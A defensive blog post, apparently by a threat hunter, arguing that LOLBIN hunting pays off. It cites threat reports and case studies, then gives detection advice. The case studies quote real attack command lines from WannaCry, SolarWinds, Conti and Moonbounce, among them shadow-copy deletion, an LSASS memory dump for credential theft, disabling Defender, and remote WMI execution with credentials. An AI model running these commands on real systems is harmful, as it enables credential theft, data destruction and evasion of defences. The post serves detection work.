Why Hunting For LOLBINs Is One Of The Best Bets
Introduction
While working on “Malicious Command-Line”(MAL-CL), documenting and researching the many use cases different tools can be (ab)used via the command line. I noticed a trend that in hindsight seems “obviously obvious” but is I believe worth saying nonetheless.
You don’t drop things just because they’re old and dusty, you drop them only when they stop working
And by things that “work” I mean of course our beloved LOLBINs.
LOLBINs are in some way like shiny pokemon in the sense that once you catch one you need to brag about it by using it all the time.
Now, we might talk about the latest C2 framework and how it’ll offer command line obfuscation, parent/child spoofing, EDR unhooking, Direct Syscal invokes, and some other shenanigans that I’m not even aware of and while there is a thread of truth in those statements and attackers are certainly using these “advanced” techniques. The fact of the matter is attacks happen in a chain and in this chain often time than not LOLBINs are a big part of it.
Note: This blog post is in no capacity saying you should stop hunting for other stuff or hunt for X or Y. I’m simply pointing out a statistical observation that infer that “simple != bad” necessarily
What do the Numbers Say
Threat reports are a good reference to see attacker tradecraft in the wild, so let’s take a look at a couple of them.
A great report to look at first is the “Red Canary’s Threat Detection Report”. You should definitely check the whole report as it’s an amazing read. I’m going to simplify some things to fit the context of the blog
If we take a look at the top four techniques from this top 10 and check the most prevalent sub-techniques in each category we’ll get the following:
- T1059.001 — PowerShell
- T1059.003 — Windows Command Shell
- T1218.011 — Rundll32
- T1218.005 — Mshta
- T1543.003 — Windows Service
- T1053.005 — Scheduled Task
Most of these sub-techniques were achieved via the use of pre-installed binaries such: “schtasks”, “sc”, “powershell.exe”, “cmd.exe”, “rundll32”, “mshta”…etc.
This is not to say other techniques nor tools were used but as i’m stating from the start there are always LOLBINs at play.
Another interesting result form Kaspersky MDR team, where they released a blog post titled “Cybercriminals’ top LOLBins” where two of the most used LOLBINs were “PowerShell” as it was used in 1 in 5 “Critical Incident” and “rundll32”.
expel has also shared their annual report titled “Great eXpeltations 2022” where they shared data from their SOC and its a fantastic read. But to grab one thing from their report that fits our context here is the highlighted “Top Windows processes to monitor” which most of them are “conveniently” LOLBINs
- PowerShell
- CMD shell
- Wscript.exe
- RegSvr32.exe
- W3wp.exe
Even the term “lolbins” is still seeing a jump every year in the trends and even with nothing else this does signify something…I hope.
I could highlight this point even further with more examples from different threat reports but I think looking at real and “infamous” case studies we’ll make the point even clearer.
Case Studies
Below are simply some of the tools and command-line usage seen in this “infmaous” attacks
Wannacry (2017)
Source: WannaCry Malware Profile
icacls . /grant Everyone:F /T /C /Qattrib +h +s <Drive_Letter>:\$RECYCLEtaskkill.exe /f /im sqlserver.exetaskkill.exe /f /im sqlwriter.exetaskkill.exe /f /im mysqld.execmd.exe /c start /b @WanaDecryptor@.exe vsvssadmin delete shadows /all /quietwmic shadowcopy deletebcdedit /set {default} bootstatuspolicy ignoreallfailuresbcdedit /set {default} recoveryenabled nowbadmin delete catalog -qcscript.exe //nologo <1 character>.vbs
Solarwinds (2020)
Source: Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop
wmic /node:[target] process call create “rundll32 c:\windows\[folder]\[beacon].dll [export]”Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\Windows\[folder]\[beacon].dll [export]’ -ComputerName [target]rundll32.exe c:\windows\[folder]\[beacon].dll [export]netsh advfirewall firewall add rule name=”[rulename1]” protocol=UDP dir=out localport=137 action=blockschtasks /query /v /s [target] /fo csvsc \\[target] query type=service state=allwmic /node:”[target]” service get name,startnamereg add HKLM\system\currentcontrolset\services\[service name] /v Start /t REG_DWORD /d 4″
Conti Leak (2021)
Source: Conti Manual Leak
whoami /groupsnet localgroup administratorsnltest /dclist:[domain]rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump PID C:\ProgramData\lsass.dmp fullwmic /node: {1} process call create "rundll32.exe C:\ProgramData\2.dll StartW"wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd / c vssadmin list shadows >> c: \log.txt"powershell Set-MpPreference -DisableRealtimeMonitoring $truereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 / f
Moonbounce (2022)
net start "iscsiwmi"sc stop iscsiwmisc delete iscsiwmireg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "iscsiwmi" /t REG_MULTI_SZ /d "iscsiwmi" /fsc create "iscsiwmi" binPath= "$system32\svchost.exe -k iscsiwmi" type= share start= auto error= ignore DisplayName= "iscsiwmi"SC failure "iscsiwmi" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "iscsiwmi" ""iSCSI WMI Classes That Manage Initiators, Ports, Sessions and Connections""reg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "$windir\Microsoft.NET\Framework64\v4.0.30319\System.Mail.Service.dll" /fnet start "iscsiwmi"
No matter the sophistication of the attacker weather be it a supply chain or a UEFI implant at some point in the attack chain LOLBINs “will” be used.
Hunting & Detecting LOLBINs Usage
Whilst the experience of detecting LOLbin’s could and will be different from one company to another (after all these are system binaries or admin utilities getting abused). There are common guidelines that can help.
Keeping Up With The Trends
“You can’t defend what you don’t know” — This mean that if you’re not aware that “certutil” can be abused as a downloader you can’t detect its usage.
Now if you’re one of those who are saying: “No…Don’t focus on the tool focus on the behaviour” know that this article is not aim for you as you’re already ahead of most. So let’s keep it simple for the sake of the blog.
To keep up with the latest LOLBINs in town fortunalty there are a couple of ways:
- LOLBAS-Project
- Infosec twitter and hashtags such as #lolbin
- Projects like MAL-CL that keeps track of how command line utitilites can be “abused”
Baseline and AppControl
In the case where you’re already aware of what’s out there and wondering how can I detect this. Stop and try to block it first instead.
Using stuff like WDAC from Microsoft or something like Symantec’s Adaptive Protection will help you baseline and block the stuff that you don’t use. See link below as an example.
Log, Collect and Detect
There are some LOLBINs that you can’t do a lot about and in those case detection will come to our help. Having something like command-line logging enabled and Sysmon logging is ver helpful to find these kind of stuff.
SIGMA is a great resource along with others to find detections about these LOLBINs
Conclusion
As a conclusion, the idea of focusing on LOLBINs might be a controversial one to some. But as I stated multiple times, this blog is here to highlight the importance of LOLBINs in attackers tradecraft and why its shouldn’t be ignored.
As always following a structure like the Pyramid of Pain in your hunting logic, priority and coverage is always a great choice but if you don’t have the necessary resources and your hesitating between behaviour and LOLBINs, I say go for LOLBINs first.
I hope you found the information here useful and helpful. If you want discuss this or anything infosec related you can find me on twitter @nas_bench